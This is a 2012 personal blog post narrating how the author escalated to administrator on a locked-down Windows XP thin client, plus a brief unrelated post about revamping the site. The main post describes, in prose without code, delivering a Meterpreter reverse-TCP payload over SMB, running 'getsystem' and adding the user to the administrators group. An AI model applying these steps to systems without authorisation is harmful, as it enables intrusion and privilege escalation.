Web Log and News

24/03/2012 @ 11:07 (GMT)

Hacking into a Thin Client

I ran into an interesting problem yesterday that I thought I'd share. A colleague was attempting to log into an old Windows XP Thin-Client computer to check out what was on it, and how it was configured. Unfortunately the device was setup to automatically log in a low level user, and there didn?t appear to be a way of logging in as an administrative user. First I tried things a normal user might try:

• Logging off? Nope, it would auto-login as the low level user again
• Change the password so it couldn't auto-login anymore? Nope, didn't have enough permissions to change it
• Pressing and holding the shift key to break the auto-login process? Nope, didn't want to work
• Fast User Switching? No, the service was disabled
• Booting into safe mode? Nope, it would BSOD on any attempt at safe mode

Humm ok, time to get a little more creative. Let?s assume we have physical access to the machine as well, what else can we do?

• Booting from a CD to edit the auto-login property of the registry? Nope, it didn't have a CD-ROM
• Booting from a USB key to edit the registry? Nope, it wouldn't boot from a USB device
• Booting it from the network via PXE boot? Nope, it wouldn't PXE boot
• Changing the boot order in the BIOS? Nope, it was password protected, and the password I was given didn't work
• Ripping out the Hard Drive and attaching it to another machine? I could have done this, but the hard drive in question was a flash drive, and I didn't really want to start taking it to bits

Humm ok, so we're stuck with modifying things within Windows itself. The Thin-Client has been fairly heavily locked down, I can do almost nothing with the start menu, I can't really access the file system or look around. So what can I do in there?

• Create files/shortcuts on the desktop? Yes! We can do that
• Accessing the command line? Yes! We can do that
• Modifying services? No, I can view the services but I can't change their status
• Modifying system files? Nope, didn't have enough permissions to change anything
• Search the filesystem? Nope, the searching service has been disabled
• Use 'runas' to run regedit.exe as the administrator? Nope, the 'secondary logon' service is completely missing

Ok, so we can access the command line and create shortcuts, but that's about it, I can't seem to escalate my permissions in a legit way. Time to start thinking like a hacker

• What sort of patch status does this machine have? Thin-clients are notorious for not being patched. As luck would have it, it appears this machine is running Windows XP Service Pack 2 with no other patches applied
• Can I access the registry? Yes, it seems I can, but I don't have permissions to much in there
• Are there any unusual services running that I can use to escalate permissions? No, there are barely any services running at all, and nothing from a 3rd party
• Is there anything running on startup that I can replace with another binary? No, nothing starts with the computer
• Is there any application with exploits in them I can use? No, just RDP and Putty on the desktop. Nothing else has been installed
• Can I use the task-scheduler to elevate permissions? No, the scheduler service has been disabled
• Is the Windows Firewall turned on? Yes it is, and all network shares have been disabled
• Does a full Nmap network based scan turn up anything? No, it appears this machine has been completely firewalled off

Ok, let's assume I can get access to the network the device is sitting on. What can I do from a network based attack? We can't do anything directly to the machine, as nmap didn't turn up any open ports, and we've already tried PXE booting the machine. Lets try another tack, lets let the machine come to us. We know that Putty and RDP are on the machine, both of which can be used to transfer files, and we know we can write to the desktop, so can we get a custom binary on the machine instead? At this stage I had a number of thoughts about how to get a binary on the machine.

• A Teensy. Although USB mass storage devices have been disabled, I can still use a USB keyboard and mouse. A Teensy might be able to emulate this. Unfortunately, I don't have a teensy to hand
• RDP. Typically file transfers are enforced at the server side. I could RDP into another machine from the Thin-Client and copy a binary back
• Putty. I could SSH into another machine and transfer a binary file to my desktop, either through SCP or straight text transfer
• I can't share any directories, but that doesn't mean I can't connect to any. I could transfer a file over SMB to the Thin-Client

I decided to give transferring files over Windows shares (SMB) a try as it was the easiest method. The next question was, is something like Software Restriction Policies enabled on the Thin-Client, preventing me from running custom binaries. And if it's not, is there any hidden Anti-Virus lerking around? To test this, mapped a network share from the Thin-Client to my attacker machine, and copied a the EICAR batch file over to the Thin-Client desktop and ran it. It ran without any issues, which runs out Anti-virus being on this machine. Time to try some other files.

First off, I created a Windows executable of the Meterpreter file, using MSFPayload. I set the payload to be a reverse TCP connection back to my attacker machine (to bypass the firewall) and copied it to the Thin-Client. Next up, I created a listener on the attacker machine using Multi/Handler, and then on the thin-client ran the Meterpreter binary.

Success! I got a reverse connection back from the Thin-client to my attacker machine. The next step was to run the 'getsystem' command from within Meterpreter to give me SYSTEM privileges. I then migrated over to a process that was running as SYSTEM, and dropped to the shell. The last step was to add the auto-logon user to the administrators group. Once that was done, a quick reboot of the Thin-Client logged the user on with administrative privileges, and from there I could disable the annoying auto-login!

Finally! Just goes to show, if you can't do something one way, try it half a dozen other ways until it works!


----------


28/01/2012 @ 14:43 (GMT)

I'm back!

Well I completely screwed up my promise of attempting to do better at blog posting, but as no-one reads this anymore I don't feel too bad about it

As it's been 5 years since I looked at this site, and 6 years since I did any coding with it, I decided to revamp it slightly with a bit more information and a new look. Oh boy, was that ever a bad idea. Turns out not coding anything for 5 years and then delving into web coding again isn't quite as simple as I thought it would be

I'm still fiddling with the site (for now) so it'll change a bit, how much so depends if I want to reuse all of this old code or start from the last time I attempted to revamp this (MVC design anyone, what was I thinking?)


----------

----------

----------

----------


0 |